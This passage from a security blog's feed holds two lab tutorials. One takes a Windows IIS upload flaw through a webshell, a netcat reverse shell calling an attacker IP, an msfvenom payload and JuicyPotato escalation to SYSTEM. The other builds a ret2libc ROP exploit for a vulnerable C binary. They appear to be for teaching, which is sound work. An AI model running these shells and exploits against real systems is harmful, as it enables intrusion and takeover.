The documentation process is not a static endeavor. As we cover each area, our understanding evolves, prompting updates and refinements in our approach. It&apos;s a dynamic journey of continuous improvement, mirroring the iterative nature of technology itself.

By weaving together descriptions, operational insights, and thought-provoking queries, our documentation becomes a rich narrative, providing not just a record of the application&apos;s current state but a roadmap for its ongoing enhancement and fortification.

# **Conclusion**

Up to this point, we&apos;ve laid the foundation for our expedition into application auditing and API hacking. We&apos;ve set up our lab, explored OWASP methodologies, and taken our initial steps in analyzing crAPI. But what happens when we face the most critical entry point: the login portal? How do we apply our skills specifically at this crucial juncture? In the next chapter, we&apos;ll dive even deeper into the heart of the application, focusing on targeted tests for the login portal. Get ready to uncover how to unravel the hidden secrets behind each input field and strengthen crAPI&apos;s security from its most vulnerable access point. Stay tuned as we unravel the next level of our API hacking adventure!</content:encoded><author>Ruben Santos</author></item><item><title>Navigating SeImpersonatePrivilege and Unleashing Remote Code Execution</title><link>https://www.kayssel.com/post/seimpersonateprivilege</link><guid isPermaLink="true">https://www.kayssel.com/post/seimpersonateprivilege</guid><description>Explore the intrigue of Windows privilege escalation in Chapter 13 of #ActiveDirectory Chronicles. Join SeImpersonatePrivilege and JuicyPotato on a journey of ethical hacking, hands-on labs, and real-world exploits in the dynamic realm of cybersecurity.</description><pubDate>Sat, 30 Dec 2023 12:30:25 GMT</pubDate><content:encoded># **Navigating the Unknown: Introduction**

Hello, fearless explorers! Welcome to the directorial realm of Active Directory Chronicles! In today&apos;s episode, we embark on a thrilling journey into the saga of Windows privilege escalation. Our main character, SeImpersonatePrivilege, is about to steal the spotlight, unraveling the mysteries of user privilege elevation within the intricate storyline of Active Directory.

As we delve into this captivating narrative, it&apos;s worth noting that our exploration is part of a larger series titled &quot;Introduction to Active Directory,&quot; and this happens to be the enthralling Chapter 13. Throughout this series, we&apos;ve navigated through the labyrinth of Active Directory&apos;s intricacies, shedding light on various aspects of its functionality and security implications.

In this installment, our hero, JuicyPotato, takes center stage, showcasing the art of ethical testing and the indispensable role of transparent client communication in our cybersecurity drama. But wait, there&apos;s more! Our adventure wouldn&apos;t be complete without a hands-on lab setup – a crucial backdrop for the real-world action that unfolds. Armed with essential tools like wes.py, our characters are ready to stay ahead in the privilege escalation game within the vast realm of Active Directory.

So, grab your popcorn and join us for another thrilling episode of Active Directory Chronicles, where each chapter brings new challenges, exploits, and discoveries in the dynamic world of cybersecurity!

# **Unraveling the Mystery: What Lurks in This Vulnerability?**

SeImpersonatePrivilege is like a backstage pass in the Windows world, granting users the power to act on behalf of others. Imagine having the ability to wear different hats in the digital realm! But beware, this power comes with a catch – the potential to ascend to the mighty SYSTEM user.

In our story, we often encounter this privilege after pulling off some Remote Code Execution (RCE) magic on applications hosted on Internet Information Services (IIS). Don&apos;t worry if this sounds like wizardry; we&apos;ll break it down shortly. The service account running the application inherits this privilege by default, setting the stage for our cybersecurity drama.

# **Setting the Stage: Our Cyber Tale**

Now, let&apos;s walk through the process of escalating privileges using this technique with a simple scenario. Picture this: an attacker named Beru stumbles upon a server with an open port 80. Intrigued, Beru logs in, discovers the ability to upload files to the web application, and decides to take advantage.

In a cunning move, Beru uploads a webshell, gaining access to the server and uncovering a user with the coveted &quot;SeImpersonatePrivilege.&quot; This revelation sparks joy in Beru, as it means assuming the role of the system user, the highest level of privilege.

![](/content/images/2023/12/image-103.png)

Attack diagram

With the stage set, let&apos;s move on to the critical step – setting up our small cybersecurity laboratory.

# **Forging the Cyber Playground: Lab Setup Unveiled**

Our first move in executing the attack is to establish a vulnerable lab environment. I opted for a Windows Server 2016 on my trusty Proxmox setup – a cloud-ready operating system delivering security layers and Azure-inspired innovation.

[Windows Server 2016 | Microsoft Evaluation Center](https://www.microsoft.com/en-us/evalcenter/download-windows-server-2016)

If you&apos;re curious about the setup process, check out my series where I guide you through configuring Windows servers in Proxmox:

[Offensive Lab](https://www.kayssel.com/series/offensive-lab/)

Once the installation is complete, we&apos;ll transform the server into an IIS (Internet Information Service). Follow the configuration steps, and voilà! Your server should now proudly display the familiar Windows IIS page, confirming a successful setup.

![](/content/images/2023/12/image-79.png)

Select that we want to add a new functionality

![](/content/images/2023/12/image-80.png)

We select that we want it to be IIS

![](/content/images/2023/12/image-81.png)

Check the &quot;HTTP Activation&quot; checkbox

![](/content/images/2023/12/image-82.png)

Service installation process

![](/content/images/2023/12/image-83.png)

Default IIS page

To simulate a file upload scenario, we&apos;ll create an application. Check out the code for two files that need to be placed in the specified path: `C:\inetpub\wwwroot`.

```cs
using System;
using System.IO;
using System.Web;

public partial class FileUpload : System.Web.UI.Page
{
    protected void Page_Load(object sender, EventArgs e)
    {
    }

    protected void btnUpload_Click(object sender, EventArgs e)
    {
        if (fileUpload.HasFile)
        {
            try
            {
                string fileName = Path.GetFileName(fileUpload.FileName);
                string uploadPath = Server.MapPath(&quot;~/uploads/&quot;); 

                if (!Directory.Exists(uploadPath))
                {
                    Directory.CreateDirectory(uploadPath);
                }

                string filePath = Path.Combine(uploadPath, fileName);
                fileUpload.SaveAs(filePath);

                lblStatus.Text = &quot;Archivo subido con éxito.&quot;;
            }
            catch (Exception ex)
            {
                lblStatus.Text = &quot;Error uploading the file. Details: &quot; + ex.Message;
            }
        }
        else
        {
            lblStatus.Text = &quot;Please select a file&quot;;
        }
    }
}

```

```html
&lt;%@ Page Language=&quot;C#&quot; AutoEventWireup=&quot;true&quot; CodeFile=&quot;FileUpload.aspx.cs&quot; Inherits=&quot;FileUpload&quot; %&gt;

&lt;!DOCTYPE html&gt;
&lt;html xmlns=&quot;http://www.w3.org/1999/xhtml&quot;&gt;
&lt;head runat=&quot;server&quot;&gt;
    &lt;title&gt;File Upload Example&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
    &lt;form id=&quot;form1&quot; runat=&quot;server&quot;&gt;
        &lt;div&gt;
            &lt;h2&gt;File Upload Example&lt;/h2&gt;
            &lt;asp:FileUpload ID=&quot;fileUpload&quot; runat=&quot;server&quot; /&gt;
            &lt;br /&gt;
            &lt;asp:Button ID=&quot;btnUpload&quot; runat=&quot;server&quot; Text=&quot;Upload&quot; OnClick=&quot;btnUpload_Click&quot; /&gt;
            &lt;br /&gt;
            &lt;asp:Label ID=&quot;lblStatus&quot; runat=&quot;server&quot; Text=&quot;&quot;&gt;&lt;/asp:Label&gt;
        &lt;/div&gt;
    &lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;


```

![](/content/images/2023/12/image-100.png)

Page setup

But hold on! When attempting to upload a file, you might hit a snag. That&apos;s because the application lacks the necessary permissions for file uploads. Fear not, we&apos;ll address this by adjusting the privileges of the folder where the files are stored.

![](/content/images/2023/12/image-84.png)

Lack of privileges

To address this, you can adjust the privileges of the folder where the uploaded files are stored. You can accomplish this through the Security section within the folder properties.

![](/content/images/2023/12/image-85.png)

Properties

Specifically, you&apos;ll need to grant all users full control over this folder. To achieve this, select the &quot;Full Control&quot; option.

![](/content/images/2023/12/image-86.png)

Grant privileges to users

After following these steps, you&apos;ve successfully set up the application to permit file uploads. Windows offers a utility for handling all things web service-related called &quot;inetmgr.&quot; The authorization we bestowed upon the folder could have also been established via &quot;inetmgr.&quot; In either case, this tool will streamline the exploitation process in our lab by enabling the listing of documents in the service. To do this, simply click on &quot;Directory Browsing&quot; and activate it.

![](/content/images/2023/12/image-88.png)

inetmgr

![](/content/images/2023/12/image-87.png)

Enable directory list

With this configuration, you can now list directories on the web server, simplifying the process of accessing a potential webshell.

![](/content/images/2023/12/image-101.png)

Directory listing

With these configurations in place, your scenario is ready, and the exploitation phase awaits.

# **Elevating the Game: The Art of Privilege Escalation**

With our lab setup complete, it&apos;s time for the exciting part. Beru identifies the IIS with the web application allowing file uploads.

![](/content/images/2023/12/image-91.png)

File upload location

![](/content/images/2023/12/image-102.png)

Directory with webshells

Seeing this, Beru seizes the opportunity, uploading an ASPX webshell to test the waters for remote commands. After a successful upload, Beru confirms Remote Code Execution (RCE) capability. The user executing the application now possesses the coveted &quot;SeImpersonatePrivilege.&quot;

![](/content/images/2023/12/image-92.png)

User privileges

Beru, now armed with this privilege, employs a slick technique to access the machine via RCE. The advantage? It leaves no trace on the client machine – a cleaner operation.

![](/content/images/2023/12/image-106.png)

Technique diagram

To execute this, Beru copies the nc.exe binary to a folder containing all its post-exploitation files.

![](/content/images/2023/12/image-105.png)

Folder with all files

Upon being copied to that directory, Beru proceeds to mount a Samba server on the designated path.

![](/content/images/2023/12/image-93.png)

Network shared folder

Now, Beru executes the following command, establishing a connection to his machine through nc.exe by accessing the network shared folder created on the SMB server. (Remember to run a listening instance of nc on the attacker&apos;s machine.)

```bash
nc -nvlp 4444 # Beru&apos;s machine

```

```bash
\\192.168.1.148\smbserver\nc.exe -e cmd.exe 192.168.1.148 4444 

```

![](/content/images/2023/12/image-98.png)

Access to nc.exe via webshell and network shared folder

![](/content/images/2023/12/image-95.png)

Incoming connection

This technique provides Beru with access to the machine, enabling him to proceed with further exploitation.

![](/content/images/2023/12/image-94.png)

Reverse shell

Here, I&apos;d like to make a brief side note. In this case, I&apos;m using JuicyPotato, an exploit that abuses SeImpersonatePrivilege. However, there are various exploits available, and the choice may depend on the specific server and its version.

[Jorge Lajara Website](https://jlajara.gitlab.io/Potatoes_Windows_Privesc)

With that clarification, Beru proceeds to copy the binary to the target machine to exploit the privilege. He continues to utilize the SMB server, eliminating the need to set up an HTTP server or any additional infrastructure.

```bash
copy \\192.168.1.148\smbserver\JuicyPotato.exe JuicyPotato.exe

```

Among all the exploits associated with SeImpersonatePrivilege, this one is the most intricate to execute, and that&apos;s why I wanted to introduce it. It encompasses a variety of options.

```bash

T:\&gt;JuicyPotato.exe
JuicyPotato v0.1

Mandatory args:
-t createprocess call: &lt;t&gt; CreateProcessWithTokenW, &lt;u&gt; CreateProcessAsUser, &lt;*&gt; try both
-p &lt;program&gt;: program to launch
-l &lt;port&gt;: COM server listen port


Optional args:
-m &lt;ip&gt;: COM server listen address (default 127.0.0.1)
-a &lt;argument&gt;: command line argument to pass to program (default NULL)
-k &lt;ip&gt;: RPC server ip address (default 127.0.0.1)
-n &lt;port&gt;: RPC server listen port (default 135)
-c &lt;{clsid}&gt;: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
-z only test CLSID and print token&apos;s user

```

Among these options, we are particularly interested in the following:

-   `-t`: This option specifies the function to invoke the new process. Typically, we set it to &quot;\*&quot; to use the two existing ones.
-   `-p`: This option specifies the program to be executed. In our case, we&apos;ll often use a payload generated by msfvenom to streamline exploitation. However, it&apos;s worth noting that other actions, such as creating a user in the administrators group, could also be performed, as demonstrated in earlier chapters of this series.
-   `-l`: We use this option to specify the COM server port. My choice in this case has been 4444.

Therefore, continuing with the scenario, Beru would prepare a payload with msfvenom to run alongside the exploit.

```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=&lt;IP&gt; LPORT=&lt;PORT&gt; -f exe &gt; shell.exe

```

Following the payload preparation, Beru transfers it to the machine via the earlier set up SMB server. Subsequently, he would listen on the designated &quot;LPORT,&quot; and finally, execute the exploit.

```cmd
JuicyPotato.exe -t * -p shell.exe -l 4444

```

![](/content/images/2023/12/image-97.png)

Execution of Juicypotato

With the successful execution of the exploit, Beru would have elevated his privileges to become the System user on the machine!

![](/content/images/2023/12/image-96.png)

We are system

Typically, with these three parameters configured correctly, the exploit should work. However, if you encounter issues, you may need to specify the CLSID.

[juicy-potato/CLSID/README.md at master · ohpe/juicy-potato](https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md)

Exactly, selecting the appropriate CLSID from the list based on the operating system of the target machine is crucial. In this scenario, you can utilize the `systeminfo` command to determine the operating system and its version on the target machine.

![](/content/images/2023/12/image-112.png)

Systeminfo usage

![](/content/images/2023/12/image-110.png)

Operating system selection

![](/content/images/2023/12/image-111.png)

CLSID selection

Absolutely, it&apos;s crucial to ensure that the selected CLSID corresponds to the System user. Following confirmation, you can simply copy and paste it into the command, resulting in something like this:

```bash
JuicyPotato.exe -t * -p shell.exe -l 4444 -c &quot;{C5D3C0E1-DC41-4F83-8BA8-CC0D46BCCDE3}&quot;

```

# **Exploring the Depths of Exploits**

This exploit you&apos;ve just seen is one of the most commonly used methods for privilege escalation. However, as you might anticipate, there are numerous other techniques, with many involving the exploitation of the Windows kernel.

In the past, the windows-exploit-suggester tool was commonly used for this purpose, especially with older operating systems. You can still use this tool, and here is the link:

[GitHub - AonCyberLabs/Windows-Exploit-Suggester: This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.](https://github.com/AonCyberLabs/Windows-Exploit-Suggester)

However, be aware that windows-exploit-suggester may not recognize many modern operating systems because it&apos;s quite old. Consequently, I recommend using wes.py instead. Here is the tool:

[GitHub - bitsadmin/wesng: Windows Exploit Suggester - Next Generation](https://github.com/bitsadmin/wesng)

It&apos;s a straightforward tool to use. After obtaining information about the operating system using the systeminfo command in Windows, you can run the tool as follows:

```bash
python3 wes.py systeminfo.txt

```

As mentioned earlier, to obtain the systeminfo.txt, you just need to execute the command on the compromised machine, copy the generated output, and transfer it to your machine.

![](/content/images/2023/12/image-128.png)

Systeminfo

The tool&apos;s output can indeed be overwhelming, presenting numerous potential exploit options. This phase can be challenging, as you may need to attempt them one by one until you successfully escalate privileges. It emphasizes the importance of a systematic and thorough approach to privilege escalation.

Absolutely, it&apos;s crucial to exercise responsible disclosure. In a non-CTF (Capture The Flag) environment, you should always inform the client before attempting exploits, especially those that might lead to a denial of service or other potential risks. Open communication ensures ethical and responsible behavior during security assessments or penetration testing engagements.

![](/content/images/2023/12/image-129.png)

wes.py

In my case, I often have a number of exploits saved that I know usually work against x operating system. Some of the most used ones are in the following repository:

[GitHub - SecWiki/windows-kernel-exploits: windows-kernel-exploits Windows平台提权漏洞集合](https://github.com/SecWiki/windows-kernel-exploits)

# **Unveiling the Cipher: Conclusions**

So, wrapping it up in our cyber-adventure: Windows privilege escalation – it&apos;s like leveling up in a digital game, and SeImpersonatePrivilege is our secret passage to the VIP suite.

We went backstage with IIS and application pools, kind of like peeking behind the curtain at a tech concert. Setting up our lab was like creating the perfect stage for our exploits – hands-on and real.

JuicyPotato stole the spotlight in our demo, showing that ethics is our treasure map, and talking to clients is our secret weapon.

Here, we&apos;re the good cyber-pirates – ethical and communicative, no nasty surprises. Tools like `wes.py` are our magical compasses, helping us navigate this vast cyber-sea.

In a nutshell, we explored the art of Windows privilege escalation like true cyber-adventurers! Until the next treasure hunt! 🏴‍☠️💻

# Resources

[SeImpersonatePrivilege – Windows Privilege Escalation](https://juggernaut-sec.com/seimpersonateprivilege/)</content:encoded><author>Ruben Santos</author></item><item><title>ROP Magic: Exploiting Linux Binaries with ret2libc</title><link>https://www.kayssel.com/post/ret2libc</link><guid isPermaLink="true">https://www.kayssel.com/post/ret2libc</guid><description>Discover the art of ROP in binary exploitation. From buffer overflows to crafting a &quot;/bin/sh&quot; execution using libc gadgets, this article provides insights into bypassing security measures and mastering exploit development with practical examples.</description><pubDate>Sun, 24 Dec 2023 11:53:42 GMT</pubDate><content:encoded># Introduction

Welcome to a captivating journey into the world of Linux binary exploitation! Today, we dive into the sophisticated realm of Return Oriented Programming (ROP), an essential technique for any budding cybersecurity enthusiast. We&apos;ll tackle the intriguing variant of ret2libc, taking you step-by-step through the process of building a practical exploit. Whether you&apos;re a seasoned pro or a curious newcomer, prepare to gain valuable insights into the art of turning vulnerabilities into powerful tools. Let&apos;s embark on this adventure and unlock the secrets of ROP together!

# **Elevating the Level: Unpacking execstack and Its Implications**

Up until now, all the binaries we&apos;ve crafted were executed with a set of specific options, tailored to thwart binary exploitation techniques:

```bash
gcc -m32 -no-pie -fno-stack-protector -ggdb -mpreferred-stack-boundary=2 -z execstack -o vulnerable vulnerable.c```
```

Many of these options serve as safeguards against exploitation strategies. Today, I want to zero in on one in particular: `execstack`. This security measure blocks code execution on the stack. But what does this mean for our exploits? Essentially, it allows us to place our shellcode in the stack, but prevents it from being executed. However, there&apos;s no need for alarm. In the realm of cybersecurity, every implemented &quot;patch&quot; soon meets a clever workaround. This is precisely where Return Oriented Programming (ROP) comes into play, emerging as a response to this new limitation in exploit development. But what exactly is ROP, and how does it function?

# **Decoding ROP: The Art of Return Oriented Programming**

Return Oriented Programming (ROP) comes into play when a buffer overflow allows an attacker to overwrite a program&apos;s call stack with malicious data, thereby manipulating its execution. Unlike traditional methods that inject new shellcode, ROP cleverly utilizes existing code segments within the program, known as &quot;gadgets,&quot; which conclude with a &apos;ret&apos; (return) instruction.

These gadgets are essentially short instruction sequences tailored to perform specific tasks, each culminating in a &apos;ret&apos; instruction. This setup enables the attacker to string together multiple gadgets, forming a controlled execution path. By crafting a chain of these gadgets on the call stack, the final &apos;ret&apos; instruction deftly redirects execution to the next return address specified by the attacker.

ROP&apos;s versatility stems from its ability to harness code from any part of the binary granted execution permissions. In this article, we&apos;ll focus on employing executable code (gadgets) specifically from libc, a strategy known as ret2libc. This approach enjoys widespread popularity due to libc&apos;s status as the quintessential C library, embedded in almost all C language programs.

&lt;details&gt;
&lt;summary&gt;Consider the following simple C code snippet:&lt;/summary&gt;

```c
#include &lt;stdio.h&gt; //At the time of import, we are using libc

int main() {
    printf(&quot;Hola, mundo!\n&quot;);
    return 0;
}


```
&lt;/details&gt;


While ROP might initially appear daunting, we will demystify it by developing an exploit using vulnerable code, offering a clearer understanding of this sophisticated technique.

# **Vulnerable Code: The Gateway to ROP Exploitation**

To demonstrate the Return Oriented Programming (ROP) technique, let&apos;s examine a piece of code that is inherently vulnerable:

```c
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;
#include &lt;stdlib.h&gt;


int main(int argc, char *argv[]){
	char name[200];
	strcpy(name, argv[1]);
	printf(&quot;Hii %s\n&quot;, name);
	return 0;
}

```

This straightforward code does three things: it reads the input from the first argument, copies it to the variable `name`, and then prints it out. As we&apos;ve explored in previous chapters, the use of `strcpy` without controlling the number of characters leads to a potential buffer overflow. This vulnerability can be exploited to manipulate the execution of the binary. For our purpose, we&apos;ll compile this program without stack protection, allowing us to execute code on the stack:

```bash
gcc -m32 -no-pie -fno-stack-protector -ggdb -mpreferred-stack-boundary=2 -o vulnerable vulnerable.c

```

This setup creates an ideal environment to demonstrate how ROP can be effectively implemented, despite the inherent security mechanisms designed to prevent such exploits.

# **Crafting the Attack Strategy: Buffer Overflow Meets ROP**

To construct our exploit, we&apos;ll employ a fusion of buffer overflow and Return Oriented Programming (ROP) techniques to execute a shell. The process unfolds in several strategic steps:

1.  **Buffer Overflow Initiation**: We&apos;ll commence by causing a buffer overflow. The primary objective here is to overwrite the return address in the stack. Our endgame? To replace it with the memory address of our first chosen gadget.
2.  **Determining the Offset**: Once we&apos;ve established the correct offset needed to induce the buffer overflow and successfully overwritten the return address, we&apos;ll turn our attention to examining the range of memory addresses that libc loads. This step is crucial for identifying the starting point of our ROP chain.
3.  **Gadget Hunting in libc**: The next phase involves scouring libc for potential gadgets to orchestrate a ret2libc type attack, as discussed earlier. These gadgets must be capable of executing the `execve` system call, thereby enabling us to run a &quot;/bin/sh&quot; command.
4.  **Synthesizing the Exploit**: With all the necessary components at hand - the buffer overflow offset, return address, and suitable gadgets - we&apos;ll piece together our exploit.

**Visualizing the Attack**:

Here&apos;s a high-level diagram to illustrate the attack strategy. Remember, as we&apos;ve learned from [previous experiences](https://www.kayssel.com/post/format-string-and-buffer-overflow/), the actual compiler behavior might deviate from our theoretical understanding. Hence, this diagram serves as a fundamental representation, guiding us through the attack&apos;s architecture.

![](/content/images/2023/12/image-59.png)

Attack diagram

# **Initiating Exploit Development: Analyzing the Binary with Radare**

The first step in our exploit development involves a detailed analysis of the binary. For this purpose, we&apos;ll utilize radare, a powerful reverse-engineering tool. Our objective here is to load the binary and dissect it to unearth all available symbols, providing us with vital insights into its structure.

&lt;details&gt;
&lt;summary&gt;We begin with the following command to load the binary into radare and perform an initial analysis:&lt;/summary&gt;

```bash
r2 -A vulnerable -d 

```
&lt;/details&gt;


This command initializes radare with the binary &apos;vulnerable&apos;, automatically analyzing it and entering debug mode. Once loaded, our next focus is the `main` function, which is often the starting point for understanding a program&apos;s execution flow. To examine the `main` function in detail, we use:

```bash
pdf @dbg.main

```

This command (`pdf`) prints the disassembled function located at the `main` symbol in the debugging context. It&apos;s crucial to remember that if we need to list all functions within the binary, the command `afl` (analyze functions list) can be employed. This step sets the stage for identifying key areas of interest within the binary, essential for crafting our exploit.

# **Buffer Overflow: Crafting and Analyzing the Exploit**

As we delve into our exploit development, our initial analysis reveals that the compiler has introduced more variables than anticipated. This unexpected discovery necessitates a slight modification of our strategy.

## **Understanding the Variables**

-   **var\_cch**: This variable aligns with the &quot;name&quot; variable from our original code and is our primary target for the buffer overflow.
-   **Additional Variables**: The compiler has added &quot;name&quot; and &quot;var\_4h&quot;. Of these, &quot;var\_4h&quot; is crucial for our exploit. According to our initial plan, the offset for overwriting the return address was calculated to be 204 bytes (200 for `var_cch` or `name` and 4 for `ebp`). However, the presence of `var_4h` means we need to adjust our payload by adding 4 more bytes. The variable &quot;name,&quot; located at an offset of 196 (or 0xC4 in hexadecimal), is not a concern as it falls within the 200-byte range we are already overwriting.

![](/content/images/2023/12/image-58.png)

Variables

![](/content/images/2023/12/image-75.png)

New stack after changes

## **Developing the Buffer Overflow Exploit**

With this insight, we can craft our buffer overflow exploit:

```python
import sys
 
payload = b&quot;A&quot;*200 # var_cch = name
payload +=b&quot;B&quot;*4 # var_4h
payload += b&quot;C&quot;*4 # ebp
# the following 4 characters will correspond to the return address
sys.stdout.buffer.write(payload)

```

## **Executing and Analyzing the Exploit in Radare**

Running this exploit in radare, positioned just before the `strcpy` execution, allows us to observe the memory addresses of these variables. We&apos;re particularly interested in `var_cch` for further analysis. To execute the exploit, use the command:

```bash
ood &quot;`!python3 exploit.py`&quot;

```

![](/content/images/2023/12/image-76.png)

Current positioning

![](/content/images/2023/12/image-54.png)

Values before strcpy

Positioning ourselves after `strcpy`, we can see how `var_cch` encompasses our entire payload.

![](/content/images/2023/12/image-62.png)

Current positioning

![](/content/images/2023/12/image-55.png)

Payload in variable &quot;var\_cch&quot;

Further memory inspection (using the command `pd 208`) reveals that our payload also occupies `var_4h` (shown as &quot;C&quot; or 43 in hexadecimal) and `ebp` (&quot;B&quot; or 42 in hexadecimal). The subsequent four bytes are where we&apos;ll direct the return address.

![](/content/images/2023/12/image-60.png)

## **Refining the Exploit**

&lt;details&gt;
&lt;summary&gt;A slight modification to our exploit helps us better understand the control we have gained:&lt;/summary&gt;

```python
import sys

payload = b&quot;A&quot;*200 # var_cch = name
payload += b&quot;B&quot;*4 # var_4h
payload += b&quot;C&quot;*4 # ebp
payload += b&quot;D&quot;*4 # return addr
sys.stdout.buffer.write(payload)
```
&lt;/details&gt;


When we run this updated version and position ourselves after the return address, we can confirm the successful overwrite, with the execution flow directed towards the address `0x44444444`. This demonstrates our effective control over the program&apos;s execution flow, setting the stage for the next phase of our exploit development.

![](/content/images/2023/12/image-63.png)

We managed to change the return address

![](/content/images/2023/12/image-64.png)

Flow control successfully completed!

## **Obtaining libc Addressing for ROP Chain**

After successfully achieving a buffer overflow, our next objective is to locate the address of libc. This step is essential for determining the positions of our ROP gadgets. Radare2 offers a straightforward command for this purpose:

```bash
dm

```

![](/content/images/2023/12/image-65.png)

Memory space with execution permission

This command displays the dynamic modules loaded in the process, including various instances of libc (like `/usr/lib32/libc.so.6`). Among these, our focus is on the instance with execution permission. This specific libc address is the starting point from which we&apos;ll calculate the positions of our gadgets.

Let&apos;s incorporate this newfound knowledge into our exploit code:

```python
import sys

# Assigning the base address of libc
libc_base_addr = 0xf7c00000

# Constructing the payload with the buffer overflow and the libc base address
payload = b&quot;A&quot;*200  # Overflowing var_cch (name)
payload += b&quot;B&quot;*4   # Accounting for var_4h
payload += b&quot;C&quot;*4   # Overwriting ebp
payload += b&quot;D&quot;*4   # Placeholder for the return address to be controlled
sys.stdout.buffer.write(payload)

```

# **Identifying and Implementing ROP Gadgets**

To build a successful Return Oriented Programming (ROP) chain for our exploit, the selection of the right gadgets is crucial. Our approach can be divided into several key steps:

## **Defining Execution Strategy:**

We can execute code either by using system calls (similar to our previous shellcode exploits) or by leveraging existing libc functions like `execv` or `system`.

In this case, we opt for the first method, aiming to execute `execve` via gadgets. Our target is to run a simple &quot;/bin/sh&quot; command, focusing primarily on manipulating the `ebx` and `eax` registers and searching for the &quot;int 0x80&quot; instruction.

![](/content/images/2023/12/image-66.png)

Call execve

## **Searching for Gadgets**

For efficient gadget hunting, &quot;ROPgadget&quot; is an invaluable tool. Alternatively, Radare&apos;s &quot;/R&quot; command can be used, but ROPgadget typically offers quicker results.

[GitHub - JonathanSalwan/ROPgadget: This tool lets you search your gadgets on your binaries to facilitate your ROP exploitation. ROPgadget supports ELF, PE and Mach-O format on x86, x64, ARM, ARM64, PowerPC, SPARC, MIPS, RISC-V 64, and RISC-V Compressed architectures.](https://github.com/JonathanSalwan/ROPgadget)

We start by searching for the &quot;int 0x80&quot; instruction using ROPgadget:

```bash
ROPgadget --binary /usr/lib32/libc.so.6 --only &quot;int&quot;

```

![](/content/images/2023/12/image-67.png)

We find int 0x80

Among the results, we select the appropriate gadget for syscall execution.

## **Constructing the ROP Chain:**

With the crucial &quot;int 0x80&quot; gadget identified, we integrate it into our exploit:

```python
import sys
from pwn import *


libc_base_addr = 0xf7c00000
int_080 = libc_base_addr + 0x000375a5

payload = b&quot;A&quot;*200 # var_cch = name
payload +=b&quot;B&quot;*4 # var_4h
payload += b&quot;C&quot;*4 # ebp

#ROP
payload += p32(int_080)

sys.stdout.buffer.write(payload)

```

Running this payload positions us at our chosen gadget post-return from the main function.

![](/content/images/2023/12/image-68.png)

Positioning in our gadget after returning from main

## **Placing &quot;/bin/sh&quot; in ebx:**

There are two ways to achieve this: either by placing the characters directly on the stack or by locating the string in libc. We opt for the latter:

```bash
strings -a -t x /usr/lib32/libc.so.6 | grep /bin/sh

```

![](/content/images/2023/12/image-69.png)

Find the string &quot;/bin/sh&quot;

o correctly set the memory address of &apos;/bin/sh&apos; in the ebx register, we utilize the &apos;pop&apos; instruction. This instruction is particularly useful as it transfers the last value from the stack into the ebx register. In our case, this crucial value is the memory address of &apos;/bin/sh&apos;. We can find a suitable &apos;pop&apos; instruction using the tool &apos;ROPgadget&apos; as follows

```bash
ROPgadget /usr/libc32/libc.so.6 --only &quot;pop|ret&quot;

```

![](/content/images/2023/12/image-70.png)

Find the pop instruction

# **Finalizing the Exploit**

With these adjustments in place, our exploit now looks like this:

```python
import sys
from pwn import *

# Establishing the base address of libc and the necessary gadgets
libc_base_addr = 0xf7c00000
int_080 = libc_base_addr + 0x000375a5
pop_ebx = libc_base_addr + 0x2bf5f
bin_sh_addr = libc_base_addr + 0x1b90d5

# Constructing the payload
payload = b&quot;A&quot;*200  # Overflowing var_cch (name)
payload += b&quot;B&quot;*4   # Accounting for var_4h
payload += b&quot;C&quot;*4   # Overwriting ebp

# Assembling the ROP chain
payload += p32(pop_ebx) 
payload += p32(bin_sh_addr)
payload += p32(int_080)

sys.stdout.buffer.write(payload)
```

Upon analysis, we can observe how the payload effectively loads the string into ebx. The execution of &apos;ret&apos; followed by &apos;int 0x80&apos; ensures proper functioning.

![](/content/images/2023/12/image-71.png)

pop ebx execution

![](/content/images/2023/12/image-72.png)

/bin/sh in hexadecimal

The final step involves setting the value &apos;11&apos; in eax, necessary for the &apos;execve&apos; system call. Although I&apos;ve used the &apos;add&apos; instruction, alternatives like &apos;mov&apos; or &apos;sub&apos; are also viable. To locate a suitable instruction, one can use ROPgadget:

```bash
ROPgadget --binary /usr/lib32/libc.so.6 --only &quot;add|ret&quot; | grep &quot;eax&quot;

```

![](/content/images/2023/12/image-73.png)

Instructions for setting the eax register

This approach leaves eax with the value 11, matching the &apos;execve&apos; call. Here&apos;s the complete exploit with all components aligned:

```python
import sys
from pwn import *

# [Previous code for setting up libc_base_addr and gadgets]

mov_9 = libc_base_addr + 0x00191d90
mov_2 = libc_base_addr + 0x000c8c27

# Finalizing the ROP chain
payload += p32(mov_9) 
payload += p32(mov_2) 
payload += p32(pop_ebx) 
payload += p32(bin_sh_addr)
payload += p32(int_080)

sys.stdout.buffer.write(payload)
```

Executing this exploit and inspecting the stack reveals that our gadgets are perfectly aligned to execute &quot;/bin/sh&quot;, achieving the desired command execution.

![](/content/images/2023/12/image-78.png)

![](/content/images/2023/12/image-74.png)

We successfully archived the shell

# Conclusions

As we wrap up our exploration of Return Oriented Programming (ROP) in the realm of Linux binary exploitation, it&apos;s clear that this technique stands as a cornerstone in the world of cybersecurity. Our journey through crafting a ret2libc exploit not only sheds light on the intricacies of ROP but also demonstrates its vital role in understanding and overcoming modern security defenses. This adventure has equipped you with the knowledge to approach binary vulnerabilities with confidence and creativity, paving the way for further exploration and mastery in the ever-evolving landscape of cybersecurity.

# Resources

[Ataque return to libc · Guía de exploits](https://fundacion-sadosky.github.io/guia-escritura-exploits/esoteric/6-ret2libc.html)</content:encoded><author>Ruben Santos</author></item><item><title>Time to Rise: Privilege Escalation Chronicles – Unveiling Windows Scheduled Task Exploits</title><link>https://www.kayssel.com/post/task-scheduler</link><guid isPermaLink="true">https://www.kayssel.com/post/task-scheduler</guid><description>Explore how misconfigured Windows scheduled tasks can lead to privilege escalation. Learn to set up a lab, identify vulnerabilities, and execute an attack for comprehensive understanding.</description><pubDate>Sun, 17 Dec 2023 19:10:36 GMT</pubDate><content:encoded># **Introduction: Navigating the Realm of Scheduled Tasks for Privilege Escalation**

